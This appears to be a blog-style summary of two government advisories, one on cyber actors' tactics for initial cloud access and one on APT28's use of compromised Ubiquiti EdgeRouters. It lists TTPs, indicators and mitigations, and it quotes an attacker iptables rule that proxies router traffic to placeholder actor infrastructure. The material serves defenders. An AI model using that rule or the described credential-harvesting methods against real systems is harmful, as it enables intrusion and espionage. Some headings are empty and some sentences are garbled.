The document titled “cyber actors adapt tactics for initial cloud access” released by the National Security Agency (NSA) warns of use of cyber actors have adapted their tactics to gain initial access to cloud services, as opposed to exploiting on-premise network vulnerabilities.

Benefits:

Awareness and Understanding: The document raises awareness about the shift in tactics towards cloud services, which is crucial for organizations to understand the current threat landscape.

📌Detailed TTPs: It provides detailed information on the tactics, techniques, and procedures (TTPs) used by actors, including the use of service and dormant accounts, which can help organizations identify potential threats and vulnerabilities.

📌Sector-Specific Insights: The document outlines the expansion of targeting to sectors such as aviation, education, law enforcement, and military organizations, offering sector-specific insights that can help these industries bolster their defenses.

📌Mitigation Strategies: It offers practical mitigation strategies that organizations can implement to strengthen their defenses against initial access by actors, such as implementing MFA and managing system accounts.

📌Emphasis on Fundamentals: The advisory emphasizes the importance of cybersecurity fundamentals, which can help organizations establish a strong baseline defense against sophisticated actors.

📌Global Supply Chain Relevance: The document references the actors’ involvement in the SolarWinds supply chain compromise, highlighting the global implications of such cyber espionage activities.

Defense through Cybersecurity Fundamentals in the APT

In the contemporary cybersecurity landscape, marked by the sophisticated operations of actors, the importance of adhering to cybersecurity fundamentals cannot be overstated. While advanced threats continue to evolve, leveraging cutting-edge tactics, techniques, and procedures (TTPs), a strong foundation in cybersecurity fundamentals remains a critical line of defense for organizations across all sectors. This foundational approach to cybersecurity emphasizes the implementation of best practices, policies, and controls that are designed to protect against a wide range of threats, including those from highly sophisticated adversaries.

Understanding Cybersecurity Fundamentals

📌Access Control: Ensuring that only authorized users have access to information systems and data, and that they are only able to perform actions that are necessary for their role.

📌Data Encryption: Protecting data at rest and in transit through encryption, making it unreadable to unauthorized users.

📌Patch Management: Regularly updating software and systems to address vulnerabilities and reduce the risk of exploitation.

📌Firewalls and Intrusion Detection Systems (IDS): Implementing firewalls to block unauthorized access and IDS to monitor network traffic for suspicious activity.

📌Multi-Factor Authentication (MFA): Requiring users to provide two or more verification factors to gain access to systems, significantly enhancing security.

The actors according to document “cyber actors adapt tactics for initial cloud access” has demonstrated a high level of sophistication in its cyber operations, reflecting a deep understanding of the global cyber landscape and an ability to adapt and innovate in the face of evolving security measures. This sophistication is not only evident in the technical capabilities but also in their strategic approach to cyber espionage, which involves careful target selection, meticulous planning, and the use of advanced tactics, techniques, and procedures (TTPs).

Technical Prowess and Innovation

Cyber operations are characterized by the use of custom malware and zero-day vulnerabilities—previously unknown software vulnerabilities that haven't been disclosed to the software maker or the public. The exploitation of these vulnerabilities allows them to infiltrate target networks undetected. An example of this is the SolarWinds supply chain attack, where is believed to have compromised the software development process to insert malicious code into a software update, affecting thousands of SolarWinds' clients, including government agencies and Fortune 500 companies.

Operational Security and Stealth

Operational security (OpSec) is a hallmark of operations, with the agency going to great lengths to cover its tracks and maintain stealth within compromised networks. This includes the use of encrypted channels for exfiltrating data, the careful management of command-and-control servers to avoid detection, and the use of legitimate tools and services (a technique known as "living off the land") to blend in with normal network activity. The ability to maintain a low profile within target networks often allows them to conduct long-term espionage operations without detection.

Psychological and Social Engineering Tactics

Beyond technical capabilities, it has shown adeptness in psychological and social engineering tactics. These methods are designed to manipulate individuals into divulging sensitive information or performing actions that compromise security. Phishing campaigns, spear-phishing, and other forms of social engineering are frequently used to gain initial access to target networks or to escalate privileges once inside.

Target Selection and Intelligence Gathering

The exploitation of service and dormant accounts by cyber actors represents a sophisticated and often overlooked vector of cyber-attacks. These accounts, which are created for various operational purposes within an organization's cloud and on-premises environments, can provide attackers with the access they need to carry out their objectives if not properly managed and secured.

Understanding Service and Dormant Accounts

Service accounts are specialized accounts used by applications or services to interact with the operating system or other services. They often have elevated privileges to perform specific tasks and may not be tied to an individual user's identity. Dormant accounts, on the other hand, are user accounts that are no longer actively used, either because the user has left the organization or the account's purpose has been fulfilled. These accounts are particularly risky because they are frequently forgotten, left with more privileges than necessary, and not monitored as closely as active user accounts.

Why Service and Dormant Accounts Are Targeted

📌Elevated Privileges: Service accounts often have elevated privileges necessary for system tasks, which can be exploited to gain wide access to an organization's network.

📌Lack of Monitoring: Dormant accounts are not regularly used, making them less likely to be monitored for suspicious activity, and thus an attractive target for attackers.

📌Weak or Default Credentials: Service accounts may be configured with weak or default credentials that are easier for attackers to guess or find through brute force attacks.

📌Bypassing User Behavior Analytics: Since service accounts perform automated tasks, their behavior patterns can be predictable, allowing malicious activities to blend in with normal operations and evade detection.

The strategic expansion of targeting by cyber actors to a broader range of sectors is a concerning development in the realm of global cybersecurity. This diversification of targets reflects a calculated approach by these actors to exploit the interconnected nature of modern industries and the increasing reliance on cloud services across various sectors.

Broadening the Scope of Espionage

The expansion into sectors such as aviation, education, law enforcement, local and state councils, government financial departments, and military organizations demonstrates their intent to gather intelligence from a wide spectrum of sources. This broad targeting strategy suggests that the is not only interested in traditional national security-related information but also in acquiring a diverse set of data that could provide economic, political, or technological advantages.

Implications for Different Sectors

📌Aviation: The aviation industry involves a complex ecosystem of airlines, airports, manufacturers, and support services, all of which handle sensitive data related to national security, safety, and proprietary technology.

📌Education: Universities and research institutions are rich sources of cutting-edge research and intellectual property. They are often targeted for their groundbreaking work in science, technology, and defense-related areas.

📌Law Enforcement: Law enforcement agencies hold sensitive data on criminal investigations, national security matters, and personal information of citizens, making them a high-value target for espionage.

📌Local and State Councils: Local and state government entities manage critical infrastructure, citizen services, and have access to vast amounts of personal data, which can be exploited for various malicious purposes.

The shift in focus by cyber actors to cloud services has brought the importance of securing initial access to the forefront of cybersecurity efforts. In cloud environments, initial access represents the critical juncture at which the security of the entire system is most vulnerable. Unlike traditional on-premises networks, where multiple layers of security can be deployed, cloud services are accessed over the internet, making the initial point of entry a prime target for attackers.

Initial Access as a Foothold for Attackers

Gaining initial access to cloud services allows attackers to establish a foothold within the target environment. From this position, they can potentially escalate privileges, move laterally across the network, and access sensitive data. The distributed nature of cloud services also means that compromising a single account can have far-reaching consequences, potentially giving attackers access to a wide array of resources and data.

Challenges in Securing Initial Access

📌Remote Access: Cloud services are designed to be accessed remotely, which inherently increases the attack surface. Remote access points must be secured against unauthorized entry while still providing legitimate users with the necessary access.

📌Identity and Access Management (IAM): In cloud environments, IAM becomes a critical component of security. Organizations must ensure that IAM policies are robust and that permissions are granted based on the principle of least privilege to minimize the risk of initial access by unauthorized entities.

📌Phishing and Social Engineering: Attackers often use phishing and social engineering tactics to gain initial access. These methods exploit human factors rather than technical vulnerabilities, making them difficult to defend against with traditional security measures.

Examples of Initial Access Techniques

Authentication as a Key Step in Cloud Security

In the evolving landscape of cybersecurity, the adaptation of cyber actors to target cloud services underscores a pivotal shift in the tactics of cyber espionage. This transition from exploiting on-premises network vulnerabilities to directly targeting cloud-based infrastructures marks a significant evolution in cyber threats. At the heart of this shift is the critical role of authentication as a key step in securing cloud-hosted networks against sophisticated cyber actors.

The Importance of Authentication in Cloud Environments

Authentication serves as the gateway to cloud services, determining whether access should be granted to a user or system. In cloud environments, where resources and data are hosted off-premises and accessed over the internet, the importance of robust authentication mechanisms cannot be overstated. Unlike traditional on-premises setups, where physical security measures and internal network defenses can provide layers of security, cloud services are inherently more exposed to the internet. This exposure makes the initial step of authentication not just a security measure, but a critical defense mechanism against unauthorized access.

Challenges in Cloud Authentication

The shift towards cloud services brings with it unique challenges in implementing effective authentication strategies. One of the primary challenges is the diverse and dynamic nature of cloud environments. Users access cloud services from various locations, devices, and networks, necessitating flexible yet secure authentication mechanisms that can adapt to different contexts without compromising security.

Moreover, the scalability of cloud services means that authentication mechanisms must be able to handle a large number of access requests without introducing significant latency or reducing the user experience. This requirement for scalability and user-friendliness often conflicts with the need for stringent security measures, creating a delicate balance that organizations must navigate.

Strategies for Strengthening Cloud Authentication

Key TTPs of document “cyber actors adapt tactics for initial cloud access"

📌Credential Access / T1110 Brute Forcing: actors utilize password spraying and brute forcing as initial infection vectors. This approach involves attempting multiple passwords against different accounts (password spraying) or numerous password attempts on a single account (brute forcing) to gain unauthorized access.

📌Initial Access / T1078.004 Valid Accounts: Cloud Accounts: The actors gains access to cloud services by using compromised credentials. This includes targeting both system accounts (used for automated tasks and services) and dormant accounts (inactive accounts that still remain on the system).

📌Credential Access / T1528 Steal Application Access Token: Actors exploit stolen access tokens to log into accounts without needing the passwords. Access tokens are digital keys that allow access to user accounts, and obtaining these can bypass traditional login mechanisms.

📌Credential Access / T1621 Multi-Factor Authentication Request Generation: Known as 'MFA bombing' or 'MFA fatigue,' this technique involves actors repeatedly sending MFA requests to a victim's device. The goal is to overwhelm or fatigue the victim into accepting the request, thus granting the attacker access.

📌Command and Control / T1090.002 Proxy: External Proxy: To maintain covert operations and blend in with normal traffic, actors use open proxies located in residential IP ranges. This makes malicious connections harder to distinguish from legitimate user activity in access logs.

📌Persistence / T1098.005 Account Manipulation: Device Registration: After gaining access to accounts, actors attempt to register their own devices on the cloud tenant. Successful device registration can provide persistent access to the cloud environment.

Access via Service and Dormant Accounts

The adaptation of attacks to target cloud services marks a significant evolution in the landscape of cyber espionage and cyber warfare. This shift is not merely a change in target but represents a deeper strategic adaptation to the changing technological environment and the increasing reliance of governments and corporations on cloud infrastructure. The move towards cloud services by organizations is driven by the benefits of scalability, cost-efficiency, and the ability to rapidly deploy and update services. However, this transition also presents new vulnerabilities and challenges for cybersecurity.

Strategic Shift to Cloud

As organizations have modernized their systems and migrated to cloud-based infrastructure, actors have adapted their tactics, techniques, and procedures (TTPs) to this new environment. This adaptation is driven by the realization that cloud services, by centralizing vast amounts of data and resources, present a lucrative target for espionage and intelligence gathering. The cloud's architecture, while offering numerous advantages to organizations, also necessitates a reevaluation of security strategies to address unique vulnerabilities.

Tactics, Techniques, and Procedures (TTPs)

The adaptation of actors to cloud services involves a range of sophisticated TTPs designed to exploit the specific characteristics of cloud environments. One of the primary methods of gaining initial access to cloud-hosted networks involves authenticating to the cloud provider. This can be achieved through various means, including brute forcing and password spraying to access services and dormant accounts. These accounts, often used to run and manage applications without direct human oversight, are particularly vulnerable as they may not be protected by multi-factor authentication (MFA) and may possess high levels of privilege.

Furthermore, actors have been observed using system-issued tokens for authentication, bypassing the need for passwords. They have also exploited the process of enrolling new devices to the cloud, bypassing MFA through techniques such as "MFA bombing" or "MFA fatigue." Additionally, the use of residential proxies to obscure their internet presence and make malicious activity harder to detect represents another layer of sophistication in their operations.

Implications and Mitigations

The adaptation of actors to target cloud services has significant implications for cybersecurity. It underscores the need for organizations to implement robust security measures tailored to the cloud environment. This includes enforcing strong password policies, implementing MFA, managing and monitoring service and dormant accounts, and configuring device enrollment policies to prevent unauthorized access. Additionally, adjusting the validity time of system-issued tokens and employing network-level defenses to detect and mitigate the use of residential proxies are critical steps in defending against these threats.

The document titled “cyber actors adapt tactics for initial cloud access” released by the National Security Agency (NSA) warns of use of cyber actors have adapted their tactics to gain initial access to cloud services, as opposed to exploiting on-premise network vulnerabilities.

This shift is in response to organizations modernizing their systems and moving to cloud-based infrastructure. The high-profile cyber campaigns like the SolarWinds supply chain compromise are now expanding to sectors such as aviation, education, law enforcement, local and state councils, government financial departments, and military organizations.

The stark reality is that to breach cloud-hosted networks, these actors need only to authenticate with the cloud provider, and if they succeed, the defenses are breached. The document highlights a particularly disconcerting aspect of cloud environments: the reduced network exposure compared to on-premises systems paradoxically makes initial access a more significant linchpin.

Over the past year, the TTPs observed have been alarmingly simple yet effective, with the cyber actors exploiting service and dormant accounts through brute force attacks. The document offers a cold comfort implies a race against time to fortify their defenses against these TTPs to prevent initial access.

Keypoints

📌Adaptation to Cloud Services: Cyber actors have shifted their focus from exploiting on-premises network vulnerabilities to directly targeting cloud services. This change is a response to the modernization of systems and the migration of organizational infrastructure to the cloud.

📌Authentication as a Key Step: To compromise cloud-hosted networks, cyber actors must first successfully authenticate with the cloud provider. Preventing this initial access is crucial for stopping from compromising the target.

📌Expansion of Targeting: Cyber actors have broadened their targeting to include sectors such as aviation, education, law enforcement, local and state councils, government financial departments, and military organizations. This expansion indicates a strategic diversification of targets for intelligence gathering.

In December 2023, APT28 actors developed MASEPIE, a small Python backdoor capable of executing arbitrary commands on victim machines. An FBI investigation revealed that on more than one occasion, APT28 used compromised Ubiquiti EdgeRouters as command-and-control (C2) infrastructure for MASEPIE backdoors deployed against targets.

Command-and-Control Infrastructure

While APT28 does not deploy MASEPIE on EdgeRouters themselves, the compromised routers have been used as C2 infrastructure to communicate with and control MASEPIE backdoors installed on systems belonging to targeted individuals and organizations.

The data sent to and from the EdgeRouters acting as C2 servers was encrypted using a randomly generated 16-character AES key, making it more difficult to detect and analyze the malicious traffic.

MASEPIE Backdoor Functionality

MASEPIE is a Python-based backdoor that allows APT28 actors to execute arbitrary commands on the infected systems. This backdoor provides the threat actors with a persistent foothold and remote control capabilities, enabling them to carry out various malicious activities, such as:

Data exfiltration

📌 Lateral movement within the compromised network

APT28 actors have been using compromised Ubiquiti EdgeRouters to establish proxy connections and reverse SSH tunnels to their dedicated infrastructure. This allows them to maintain persistent access and control over the compromised devices, even after password changes or other mitigation attempts.

Reverse Proxy Connections

APT28 actors have utilized iptables rules on EdgeRouters to establish reverse proxy connections to their dedicated infrastructure. Network defenders and users can review iptables chains and Bash histories on EdgeRouters for unusual invocations, such as the following example:

iptables -t nat -I PREROUTING -d <router IP address> -p tcp -m tcp --dport 4443 -j DNAT -to-destination <APT28 dedicated infrastructure>:10081

This iptables rule redirects incoming traffic on port 4443 of the EdgeRouter to the APT28 dedicated infrastructure on port 10081, effectively creating a reverse proxy connection.

Reverse SSH Tunnels

Additionally, APT28 actors have uploaded adversary controlled SSH RSA keys to compromised EdgeRouters to establish reverse SSH tunnels. These tunnels allow the actors to access the compromised devices, even after password changes or other mitigation attempts.

Network defenders and users can review the following directories on EdgeRouters for unknown RSA keys:

APT28 actors have been exploiting CVE-2023-23397, a critical elevation of privilege vulnerability in Microsoft Outlook on Windows, to facilitate NTLMv2 credential leaks. This vulnerability, which was a zero-day at the time of its initial exploitation by APT28 in early 2022, allows Net-NTLMv2 hashes to be leaked to actor-controlled infrastructure.

NTLMv2 Credential Harvesting

To exploit CVE-2023-23397 and harvest NTLMv2 credentials, APT28 actors have been using two publicly available tools:

📌 http://ntlmrelayx.py: This tool is part of the Impacket suite, a collection of Python classes for working with network protocols. APT28 actors have used http://ntlmrelayx.py to execute NTLM relay attacks [T1557] and facilitate the leakage of NTLMv2 credentials.

📌 Responder: Responder is a tool designed to capture and relay NTLMv2 hashes by setting up a rogue authentication server [T1556]. APT28 actors have installed Responder on compromised Ubiquiti EdgeRouters to collect NTLMv2 credentials from targeted Outlook accounts.

The FBI has collected evidence of APT28's CVE-2023-23397 exploitation activity on numerous compromised EdgeRouters.

Logging and Detection

📌 When using the default configurations, Responder logs its activity to the following files:

APT28 actors have been hosting custom Python scripts on compromised Ubiquiti EdgeRouters to collect and validate stolen webmail account credentials. These scripts are typically stored alongside related log files in the home directory of a compromised user, such as:

/home/<compromised user>/srv/http://core.py

/home/<compromised user>/srv/debug.txt

The FBI claims that they have recovered verbose log files containing information about APT28 activity on the compromised EdgeRouters.

Custom Python Scripts

📌 The custom Python scripts hosted on the compromised EdgeRouters serve the purpose of collecting and validating stolen webmail account credentials. APT28 actors use these scripts as part of their credential harvesting operations, targeting specific webmail users.

📌 The scripts are designed to automatically break captcha problems on webmail login pages, allowing the actors to bypass this security measure and gain unauthorized access to the targeted accounts. To achieve this, the scripts make connections to the API endpoint api[.]anti-captcha[.]com, which is used by APT28 actors for captcha-solving purposes.

APT28 actors have been leveraging default credentials and trojanized OpenSSH server processes to access Ubiquiti EdgeRouters. The trojanized OpenSSH server processes are associated with Moobot, a Mirai-based botnet that infects Internet of Things (IoT) devices using remotely exploitable vulnerabilities, such as weak or default passwords.

Trojanized OpenSSH Server Binaries

📌 Trojanized OpenSSH server binaries downloaded from packinstall[.]kozow[.]com have replaced legitimate binaries on EdgeRouters accessed by APT28. These trojanized binaries allow remote attackers to bypass authentication and gain unauthorized access to the compromised routers.

📌 The Moobot botnet is known for its ability to exploit vulnerabilities in IoT devices, particularly those with weak or default passwords. By replacing the legitimate OpenSSH server binaries with trojanized versions, APT28 actors can maintain persistent access to the compromised EdgeRouters and use them for various malicious purposes.

Mirai-based Botnet

📌 Moobot is a Mirai-based botnet, which means it is derived from the infamous Mirai malware that first emerged in 2016. Mirai is designed to scan for and infect IoT devices by exploiting common vulnerabilities and using default credentials. Once a device is infected, it becomes part of the botnet and can be used for distributed denial-of-service (DDoS) attacks, credential stuffing, and other malicious activities.

📌 The use of a Mirai-based botnet like Moobot highlights the importance of securing IoT devices, such as routers, by changing default passwords and keeping the firmware up to date. The combination of weak or default passwords and unpatched vulnerabilities makes these devices an attractive target for threat actors like APT28.

Impact on Compromised EdgeRouters

Threat Actor's operations have targeted various industries, including Aerospace & Defense, Education, Energy & Utilities, Governments, Hospitality, Manufacturing, Oil & Gas, Retail, Technology, and Transportation. The targeted countries include the Czech Republic, Italy, Lithuania, Jordan, Montenegro, Poland, Slovakia, Turkey, Ukraine, United Arab Emirates, and the US, with a strategic focus on individuals in Ukraine.

Potential consequences and impacts on these affected industries include:

📌 Data breaches and theft of sensitive information, intellectual property, or trade secrets.

📌 Disruption of critical infrastructure operations, such as power grids, transportation systems, or manufacturing processes.

📌 Compromise of government networks and systems, potentially leading to espionage or national security threats.

📌 Financial losses due to operational disruptions, theft of customer data, or reputational damage.

📌 Potential safety risks if control systems or operational technology (OT) networks are compromised.

📌 Loss of customer trust and confidence in the affected organizations.

The document titled «Cyber Actors Use Compromised Routers to Facilitate Cyber Operations» released by the Federal Bureau of Investigation (FBI), National Security Agency (NSA), US Cyber Command, and international partners warns of use of compromised Ubiquiti EdgeRouters to facilitate malicious cyber operations worldwide.

The popularity of Ubiquiti EdgeRouters is attributed to their user-friendly, Linux-based operating system, default credentials, and limited firewall protections. The routers are often shipped with insecure default configurations and do not automatically update firmware unless configured by the user.

The compromised EdgeRouters have been used by APT28 to harvest credentials, collect NTLMv2 digests, proxy network traffic, and host spear-phishing landing pages and custom tools. APT28 accessed the routers using default credentials and trojanized OpenSSH server processes. With root access to the compromised routers, the actors had unfettered access to the Linux-based operating systems to install tooling and obfuscate their identity.

APT28 also deployed custom Python scripts on the compromised routers to collect and validate stolen webmail account credentials obtained through cross-site scripting and browser-in-the-browser spear-phishing campaigns. Additionally, they exploited a critical zero-day elevation-of-privilege vulnerability in Microsoft Outlook (CVE-2023-23397) to collect NTLMv2 digests from targeted Outlook accounts and used publicly available tools to assist with NTLM relay attacks

Keypoints and takeaways

📌 APT28 (also known as Fancy Bear, Forest Blizzard, and Strontium) have been exploiting compromised Ubiquiti EdgeRouters to conduct malicious cyber ops globally.

📌 The exploitation includes harvesting credentials, collecting NTLMv2 digests, proxying network traffic, and hosting spear-phishing landing pages and custom tools.

📌 The FBI, NSA, US Cyber Command, and international partners have issued a joint Cybersecurity Advisory (CSA) detailing the threat and providing mitigation recommendations.

📌 Widespread Vulnerabilities: A significant number of vulnerabilities, some 226 in total, collectively pose a substantial security risk.

📌 Outdated Components: Core components such as the Linux kernel and additional services like VPN or multimedia software in these routers are often outdated, making them susceptible to known exploits.

📌 Default Passwords and Unencrypted Connections: Many routers come with easy-to-guess default passwords and use unencrypted connections, which can be easily exploited by attackers.

📌 Compromised Devices and Data: Once a router is compromised, all devices protected by its firewall become vulnerable, allowing attackers to monitor, redirect, block, or tamper with data.

📌 Risk to Critical Infrastructure: Compromised routers can be used to attack critical infrastructure, potentially disrupting essential services in communications, energy, transportation, and water sectors.

📌 DoS and Traffic Interception: Vulnerabilities in protocols can lead to denial-of-service attacks against host services and interception of both internal and external traffic.

📌 Eavesdropping and attacks: Attackers can eavesdrop on traffic and launch further network-based attacks, making it difficult for users to detect a breach due to minimal router user interfaces.

📌 Potential for Large-Scale Exploitation: The sheer number of vulnerable devices, estimated in the millions, indicates a significant potential for widespread exploitation by malicious actors.